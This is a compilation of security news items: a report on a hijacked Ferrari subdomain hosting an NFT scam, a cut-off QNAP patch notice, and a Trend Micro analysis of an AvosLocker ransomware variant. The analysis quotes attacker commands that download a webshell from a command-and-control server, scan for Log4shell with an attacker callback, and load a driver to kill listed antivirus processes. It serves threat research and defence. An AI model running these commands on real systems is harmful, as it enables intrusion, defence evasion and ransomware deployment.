The crypto scam titled “Mint your Ferrari” enticed visitors to buy NFT tokens, falsely touting that Ferrari introduced “a collection of 4,458 horsepower [sic] NFTs on the Ethereum network.”https://platform.twitter.com/embed/Tweet.html?creatorScreenName=BleepinComputer&dnt=false&embedId=twitter-widget-0&features=eyJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X3Jlc3VsdF9taWdyYXRpb25fMTM5NzkiOnsiYnVja2V0IjoidHdlZXRfcmVzdWx0IiwidmVyc2lvbiI6MX19&frame=false&hideCard=false&hideThread=false&id=1522037756754550784&lang=en&origin=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fferrari-subdomain-hijacked-to-push-fake-ferrari-nft-collection%2F&sessionId=3ea6c8cb6e39f794149bacd26675e44783eff546&siteScreenName=BleepinComputer&theme=light&widgetsVersion=c8fe9736dd6fb%3A1649830956492&width=550px

Additional investigation by Curry and security engineer who goes by the moniker d0nut revealed that attackers exploited an Adobe Exeprience Manager flaw to hack the subdomain and host their crypto scam. 

“After looking a bit deeper… it seems this was an Adobe Experience Manager exploit. You can still find the remnants of the unhacked site by dorking around a bit,” wrote Curry.

BleepingComputer has reached out to Ferrari for comment before publishing and we await a response.

Over $800 collected before domain takedown

Keen-eyed Twitter user root@rebcesp observed the Ethereum wallet had collected a little over $800 of funds ever since the scam went up.https://platform.twitter.com/embed/Tweet.html?creatorScreenName=BleepinComputer&dnt=false&embedId=twitter-widget-1&features=eyJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X3Jlc3VsdF9taWdyYXRpb25fMTM5NzkiOnsiYnVja2V0IjoidHdlZXRfcmVzdWx0IiwidmVyc2lvbiI6MX19&frame=false&hideCard=false&hideThread=true&id=1522042363367112704&lang=en&origin=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fferrari-subdomain-hijacked-to-push-fake-ferrari-nft-collection%2F&sessionId=3ea6c8cb6e39f794149bacd26675e44783eff546&siteScreenName=BleepinComputer&theme=light&widgetsVersion=c8fe9736dd6fb%3A1649830956492&width=550px

The Ethereum wallet address associated with the scam is shown below, with the wallet balance having dropped today to approximately $130, as seen by BleepingComputer.0xD88e1C6EC0a2479258A6d2aB59D9Ae5F2874bC44

Thankfully, Etherscan has flagged the wallet address as reports emerged of suspicious activity linked to the wallet.

BleepingComputer observed the hacked Ferrari subdomain has now been taken down and throws an HTTP 403 error code:

Ferrari Forms subdomain shut down
Ferrari Forms subdomain shut down (BleepingComputer)

The mainstream attention garnered by NFTs can be attributed to their rapid adoption by artists selling their digital art for cryptocurrency at popular websites such as Rarible and OpenSea.

Just recently, an artist known as Beeple sold an NFT digital picture for $69 million in Christie’s auction.

As such, NFT scams and thefts are one of the newest forms of cryptocurrency fraud on the rise.

Just this week, BleepingComputer reported seeing Pixiv and DeviantArt artists being targeted by NFT job offers to push malware.

Last month popular NFT marketplace Rarible was targeted by scammers and malware authors.

It’s tempting to dismiss these crypto scams thinking no one falls for them, but, similar crypto scams have been hugely successful and generated hundreds of thousands of dollars in the past.

In 2018 crypto scammers had made $180K in a single day. In 2021, Twitter suffered a massive attack with threat actors walking away with $580K in a week. And, in February last year, we saw another incidence of crypto scammers making at least $145,000.

By September last year, Bitcoin.org had been hacked with attackers having successfully stolen $17,000 from unwary users in a similar scam.

Source :
https://www.bleepingcomputer.com/news/security/ferrari-subdomain-hijacked-to-push-fake-ferrari-nft-collection/

QNAP Releases Firmware Patches for 9 New Flaws Affecting NAS Devices

QNAP, Taiwanese maker of network-attached storage (NAS) devices, on Friday released security updates to patch nine security weaknesses, including a critical issue that could be exploited to take over an affected system.

“A vulnerability has been reported to affect QNAP VS Series NVR running QVR,” QNAP said in an advisory. “If exploited, this vulnerability allows remote attackers to run arbitrary commands.”

Tracked as CVE-2022-27588 (CVSS score: 9.8), the vulnerability has been addressed in QVR 5.1.6 build 20220401 and later. Credited with reporting the flaw is the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC).

Aside from the critical shortcoming, QNAP has also resolved three high-severity and five medium-severity bugs in its software –

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable anti-virus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).  In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.

Infection chain

fig1-avoslocker-ransomware-disables-av-scans-log4shell
Figure 1. AvosLocker infection chain

According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:

fig2-avoslocker-ransomware-disables-av-scans-log4shell
Figure 2. The ADSS exploit abusing CVE-2021-40539

Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used. However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.

Mapping the infection

The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server. Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process. 

fig3-avoslocker-ransomware-disables-av-scans-log4shell
Figure 3. Remotely executing an HTA file from the C&C server. Screenshots taken from Trend Micro Vison One.
fig4-avoslocker-ransomware-disables-av-scans-log4shell
Figure 4. HTA file connecting to the C&C

A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.

fig5-avoslocker-ransomware-disables-av-scans-log4shell
Figure 5. Obfuscated PowerShell script contains a shellcode

The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >. According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.

fig6-avoslocker-ransomware-disables-av-scans-log4shell
Figure 6. Gather system information

The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.

fig7-avoslocker-ransomware-disables-av-scans-log4shell
Figure 7. Executed with the /domain argument to collect username information
fig8-avoslocker-ransomware-disables-av-scans-log4shell
Figure 8. query user information for session data

The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.

fig9-avoslocker-ransomware-disables-av-scans-log4shell
Figure 9. The PowerShell downloading and installing AnyDeskMSI

We observed that a new user account was created, added to the current domain, and included in the administrator group. This ensures the attacker can have administrative rights to the infected system. The attackers also checked the running processes in the system via TaskList to check for anti-virus processes running in the infiltrated system.

fig10-avoslocker-ransomware-disables-av-scans-log4shell
Figure 10. Creating a new account with admin rights
fig11-avoslocker-ransomware-disables-av-scans-log4shell
Figure 11. Checking for anti-virus processes running

During the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.

fig12-avoslocker-ransomware-disables-av-scans-log4shell
Figure 12. Terminating security products running

Tools and functions

Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products. The tools transferred using AnyDesk are:

  • Netscan: To scan for other endpoints
  • Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints
  • Hacking tools Mimikatz and Impacket: For lateral movement
  • PDQ deploy: For mass deployment of malicious script to multiple endpoints
  • Aswarpot.sys: For disabling defense solutions. We noted that it can disable a number of anti-virus products, previously identified by Aon’s researchers.
fig13-avoslocker-ransomware-disables-av-scans-log4shell
Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk

We found an Avast anti-rootkit driver installed as service ‘asWarPot.sys’ using the command sc.exe  create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running anti-virus product. We noted the unusual use of cmd.exe for execution of the file.  

fig14-avoslocker-ransomware-disables-av-scans-log4shell
Figure 14. Executing the anti-rootkit driver in the system

Mimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were detected and deleted.

fig15-avoslocker-ransomware-disables-av-scans-log4shell
Figure 15. Detecting and deleting Mimikatz

We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.

fig16-avoslocker-ransomware-disables-av-scans-log4shell
Figure 16. Listing and terminating the security products found running in the compromised system

Verification: Manual replication of anti-virus disabling routine

We manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure 17 shows the list of processes that the routine searches on infection :

  • EndpointBasecamp.exe
  • Trend Micro Endpoint Basecamp
  • ResponseService.exe
  • PccNTMon.exe
  • SupportConnector.exe
  • AOTAgent.exe
  • CETASvc.exe
  • CETASvc
  • iVPAgent.exe
  • tmwscsvc.exe
  • TMResponse
  • AOTAgentSvc
  • TMBMServer
  • iVPAgent
  • Trend Micro Web Service Communicator
  • Tmccsf
  • Tmlisten
  • Ntrtscan
  • TmWSCSvc
fig17-avoslocker-ransomware-disables-av-scans-log4shell
Figure 17. Searching for processes

We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.

fig18-avoslocker-ransomware-disables-av-scans-log4shell
Figure 18. Driver file preparing to disable an anti-virus product

The DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.

fig19-avoslocker-ransomware-disables-av-scans-log4shell
Figure 19. DeviceIoControl as an argument with the current process ID

Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.

fig20-avoslocker-ransomware-disables-av-scans-log4shell
Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).

Other executions and lateral movement

After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.

fig21-avoslocker-ransomware-disables-av-scans-log4shell
Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)

We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.

fig22-avoslocker-ransomware-disables-av-scans-log4shell
Figure 22. XenArmor password recovery tool execution

We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network. They used the command nmap  –script log4shell.nse –script-args log4shell.waf-bypass=true –script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server. 

fig23-avoslocker-ransomware-disables-av-scans-log4shell
Figure 23. Checking for log4shell

We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.

fig24-avoslocker-ransomware-disables-av-scans-log4shell
Figure 24. Running more system network configuration discovery scans

Deploying across the network

We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.

fig25-avoslocker-ransomware-disables-av-scans-log4shell
Figure 25. Deploying malicious batch scripts to other endpoints

The deployed batch script has the following commands:

  • Disable Windows Update and Microsoft Defender
fig26-avoslocker-ransomware-disables-av-scans-log4shell
Figure 26. Disable Microsoft defense services
  • Prevents safeboot execution of security products
fig27-avoslocker-ransomware-disables-av-scans-log4shell
Figure 27. Prevent security products’ execution
  • Create new administrator account
fig28-avoslocker-ransomware-disables-av-scans-log4shell
Figure 28. Create new account
  • Add the AutoStart mechanism for the AvosLocker executable (update.exe)
fig29-avoslocker-ransomware-disables-av-scans-log4shell
Figure 29. Add Autostart for ransomware executable
  • Disables legal notice caption
fig30-avoslocker-ransomware-disables-av-scans-log4shell
Figure 30. Disable legal notice
  • Set safeboot with networking and disables Windows Error Recovery and reboot
fig31-avoslocker-ransomware-disables-av-scans-log4shell
Figure 31. Setting and disabling network and specific Windows functions

Conclusion

While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).

This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice. Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.

Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.

However, and specific to this instance, the attempt to kill an anti-virus product such as this variant’s TaskKill can also be foiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.

Avast responded to our notification with this statement:

“We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory.

The below example shows that the blocking works (output from the “sc start” command):

               (SC) StartService FAILED 1275:

               This driver has been blocked from loading

The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.

All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.

For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.”

Indicators of Compromise (IOCs) 

FileSHA256Detection
Malicious batch file componenta5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15Trojan.BAT.KILLAV.YACAA
AvosLocker executable05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5Ransom.Win32.AVOSLOCKER.SMYXBLNT
Mimikatz executable (x32 and x64)912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9HackTool.Win64.MIMIKATZ.ZTJA
e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98HackTool.Win32.Mimikatz.CNFW
Log4shell Nmap NSE scriptddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96Backdoor.Win32.CVE202144228.YACAH
Impacket tool14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8HackTool.Win32.Impacket.AA

Source :
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html